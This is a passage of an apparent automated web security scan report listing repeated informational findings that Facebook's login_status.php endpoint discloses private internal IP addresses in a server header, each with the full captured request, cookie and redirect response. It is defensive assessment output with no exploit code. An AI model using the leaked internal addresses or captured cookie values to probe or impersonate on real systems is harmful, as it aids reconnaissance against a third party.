m%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a9ede818%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fff62df8a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2ebc88684&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f39a559338&origin=http%3A%2F%2Faol.sportingnews.com%2Fff62df8a&relation=parent&transport=postmessage&frame=f2ebc88684
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.174.38
X-Cnection: close
Date: Thu, 05 May 2011 01:32:10 GMT
Content-Length: 0

20.106. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.197.34

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10429e7a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31893e34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc77bbbb4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df344ae0c8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5b1346f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff44208f0%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3772f9ad8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f344ae0c8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff44208f0&relation=parent&transport=postmessage&frame=f3772f9ad8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.197.34
X-Cnection: close
Date: Thu, 05 May 2011 01:33:34 GMT
Content-Length: 0

20.107. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.64

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcf0e28f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25b76338%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7117ccd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32d8400c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2aefb584%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b9dcf5ec%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2be8e22c4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32d8400c4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b9dcf5ec&relation=parent&transport=postmessage&frame=f2be8e22c4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.209.64
X-Cnection: close
Date: Thu, 05 May 2011 01:25:04 GMT
Content-Length: 0

20.108. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.67.129

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6a7a69b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e30ae81c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8f746478%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df12e93fd58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df169fe8258%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff314e1fe24%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f0564bbc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f12e93fd58&origin=http%3A%2F%2Faol.sportingnews.com%2Ff314e1fe24&relation=parent&transport=postmessage&frame=f1f0564bbc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.67.129
X-Cnection: close
Date: Thu, 05 May 2011 02:05:32 GMT
Content-Length: 0

20.109. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.244.75

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df225a9f59%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18dea47e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32c53f454%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3279fa49c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc935bd5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1e2c76414%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc9ec1cc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3279fa49c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1e2c76414&relation=parent&transport=postmessage&frame=f1bc9ec1cc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.244.75
X-Cnection: close
Date: Thu, 05 May 2011 01:43:20 GMT
Content-Length: 0

20.110. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.58.25

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f42cec0%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f17fd21c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29607e7a4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df200ca254%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4779f3f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffe8ae498%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df65533228&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f200ca254&origin=http%3A%2F%2Faol.sportingnews.com%2Ffe8ae498&relation=parent&transport=postmessage&frame=f65533228
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.58.25
X-Cnection: close
Date: Thu, 05 May 2011 01:02:52 GMT
Content-Length: 0

20.111. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.179.34

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df8b44b314%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bb639d44%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df280f0b9e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df34ec8fee%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13994e6b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff25f0925fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df285e52b6c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f34ec8fee&origin=http%3A%2F%2Faol.sportingnews.com%2Ff25f0925fc&relation=parent&transport=postmessage&frame=f285e52b6c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.179.34
X-Cnection: close
Date: Thu, 05 May 2011 01:33:22 GMT
Content-Length: 0

20.112. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.49.41

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5cbd96d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d3f3fb98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d7dc0e7%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15b2385ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28b205e3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Fffad56b1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ab638c38&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f15b2385ac&origin=http%3A%2F%2Faol.sportingnews.com%2Fffad56b1&relation=parent&transport=postmessage&frame=f3ab638c38
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.49.41
X-Cnection: close
Date: Thu, 05 May 2011 01:01:15 GMT
Content-Length: 0

20.113. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.97.127

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a6af95a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a491d6c4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d1167094%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dffebe250c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d1e30bb%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b2fe2628%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df38745953&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=ffebe250c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b2fe2628&relation=parent&transport=postmessage&frame=f38745953
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.97.127
X-Cnection: close
Date: Thu, 05 May 2011 02:09:33 GMT
Content-Length: 0

20.114. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.180.31

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d5f04ce8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f8b902e4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ca50d918%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31ca45bc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df92377b5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff24f745ae8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df201cd97c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
